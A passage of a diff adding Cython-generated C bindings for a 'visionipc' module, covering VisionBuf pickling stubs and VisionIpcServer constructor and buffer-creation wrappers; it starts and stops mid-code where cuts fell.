__Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionBuf.rgb.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_1__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf___reduce_cython__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf___reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_buf_cannot_be_converted_to, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionBuf.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionBuf.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_2__setstate_cython__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_2__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_buf_cannot_be_converted_to, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionBuf.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":66 + * cdef cppVisionIpcServer * server + * + * def __init__(self, string name): # <<<<<<<<<<<<<< + * self.server = new cppVisionIpcServer(name, NULL, NULL) + * + */ + +/* Python wrapper */ +static int __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + std::string __pyx_v_name; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 66, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(0, 66, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + } + __pyx_v_name = __pyx_convert_string_from_py_std__in_string(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 66, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 66, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcServer.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer___init__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *)__pyx_v_self), __PYX_STD_MOVE_IF_SUPPORTED(__pyx_v_name)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer___init__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self, std::string __pyx_v_name) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":67 + * + * def __init__(self, string name): + * self.server = new cppVisionIpcServer(name, NULL, NULL) # <<<<<<<<<<<<<< + * + * def create_buffers(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height): + */ + __pyx_v_self->server = new VisionIpcServer(__pyx_v_name, NULL, NULL); + + /* "cereal/visionipc/visionipc_pyx.pyx":66 + * cdef cppVisionIpcServer * server + * + * def __init__(self, string name): # <<<<<<<<<<<<<< + * self.server = new cppVisionIpcServer(name, NULL, NULL) + * + */ + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":69 + * self.server = new cppVisionIpcServer(name, NULL, NULL) + * + * def create_buffers(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height): # <<<<<<<<<<<<<< + * self.server.create_buffers(tp, num_buffers, rgb, width, height) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_3create_buffers(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_3create_buffers = {"create_buffers", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_3create_buffers, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_3create_buffers(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_tp; + size_t __pyx_v_num_buffers; + bool __pyx_v_rgb; + size_t __pyx_v_width; + size_t __pyx_v_height; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("create_buffers (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_tp,&__pyx_n_s_num_buffers,&__pyx_n_s_rgb,&__pyx_n_s_width,&__pyx_n_s_height,0}; + PyObject* values[5] = {0,0,0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_tp)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 69, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_num_buffers)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 69, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers", 1, 5, 5, 1); __PYX_ERR(0, 69, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_rgb)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 69, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers", 1, 5, 5, 2); __PYX_ERR(0, 69, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_width)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 69, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers", 1, 5, 5, 3); __PYX_ERR(0, 69, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_height)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 69, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers", 1, 5, 5, 4); __PYX_ERR(0, 69, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "create_buffers") < 0)) __PYX_ERR(0, 69, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 5)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); + } + __pyx_v_tp = ((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)__Pyx_PyInt_As_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(values[0])); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 69, __pyx_L3_error) + __pyx_v_num_buffers = __Pyx_PyInt_As_size_t(values[1]); if (unlikely((__pyx_v_num_buffers == (size_t)-1) && PyErr_Occurred())) __PYX_ERR(0, 69, __pyx_L3_error) + __pyx_v_rgb = __Pyx_PyObject_IsTrue(values[2]); if (unlikely((__pyx_v_rgb == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 69, __pyx_L3_error) + __pyx_v_width = __Pyx_PyInt_As_size_t(values[3]); if (unlikely((__pyx_v_width == (size_t)-1) && PyErr_Occurred())) __PYX_ERR(0, 69, __pyx_L3_error) + __pyx_v_height = __Pyx_PyInt_As_size_t(values[4]); if (unlikely((__pyx_v_height == (size_t)-1) && PyErr_Occurred())) __PYX_ERR(0, 69, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("create_buffers", 1, 5, 5, __pyx_nargs); __PYX_ERR(0, 69, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcServer.create_buffers", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_2create_buffers(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *)__pyx_v_self), __pyx_v_tp, __pyx_v_num_buffers, __pyx_v_rgb, __pyx_v_width, __pyx_v_height); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_2create_buffers(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self, enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_tp, size_t __pyx_v_num_buffers, bool __pyx_v_rgb, size_t __pyx_v_width, size_t __pyx_v_height) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("create_buffers", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":70 + * + * def create_buffers(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height): + * self.server.create_buffers(tp, num_buffers, rgb, width, height) # <<<<<<<<<<<<<< + * + * def create_buffers_with_sizes(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height, size_t size, size_t stride, size_t uv_offset): + */ + __pyx_v_self->server->create_buffers(((enum VisionStreamType)__pyx_v_tp), __pyx_v_num_buffers, __pyx_v_rgb, __pyx_v_width, __pyx_v_height); + + /* "cereal/visionipc/visionipc_pyx.pyx":69 + * self.server = new cppVisionIpcServer(name, NULL, NULL) + * + * def create_buffers(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height): # <<<<<<<<<<<<<< + * self.server.create_buffers(tp, num_buffers, rgb, width, height) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":72 + * self.server.create_buffers(tp, num_buffers, rgb, width, height) + * + * def create_buffers_with_sizes(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height, size_t size, size_t stride, size_t uv_offset): # <<<<<<<<<<<<<< + * self.server.create_buffers_with_sizes(tp, num_buffers, rgb, width, height, size, stride, uv_offset) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_5create_buffers_with_sizes(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_5create_buffers_with_sizes = {"create_buffers_with_sizes", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_5create_buffers_with_sizes, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_5create_buffers_with_sizes(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_tp; + size_t __pyx_v_num_buffers; + bool __pyx_v_rgb; + size_t __pyx_v_width; + size_t __pyx_v_height; + size_t __pyx_v_size; + size_t __pyx_v_stride; + size_t __pyx_v_uv_offset; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("create_buffers_with_sizes (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_tp,&__pyx_n_s_num_buffers,&__pyx_n_s_rgb,&__pyx_n_s_width,&__pyx_n_s_height,&__pyx_n_s_size,&__pyx_n_s_stride,&__pyx_n_s_uv_offset,0}; + PyObject* values[8] = {0,0,0,0,0,0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 8: values[7] = __Pyx_Arg_FASTCALL(__pyx_args, 7); + CYTHON_FALLTHROUGH; + case 7: values[6] = __Pyx_Arg_FASTCALL(__pyx_args, 6); + CYTHON_FALLTHROUGH; + case 6: values[5] = __Pyx_Arg_FASTCALL(__pyx_args, 5); + CYTHON_FALLTHROUGH; + case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_tp)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_num_buffers)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers_with_sizes", 1, 8, 8, 1); __PYX_ERR(0, 72, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_rgb)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers_with_sizes", 1, 8, 8, 2); __PYX_ERR(0, 72, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_width)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers_with_sizes", 1, 8, 8, 3); __PYX_ERR(0, 72, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_height)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers_with_sizes", 1, 8, 8, 4); __PYX_ERR(0, 72, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 5: + if (likely((values[5] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_size)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers_with_sizes", 1, 8, 8, 5); __PYX_ERR(0, 72, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 6: + if (likely((values[6] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stride)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers_with_sizes", 1, 8, 8, 6); __PYX_ERR(0, 72, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 7: + if (likely((values[7] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_uv_offset)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("create_buffers_with_sizes", 1, 8, 8, 7); __PYX_ERR(0, 72, __pyx_L3_error) + } + } + if 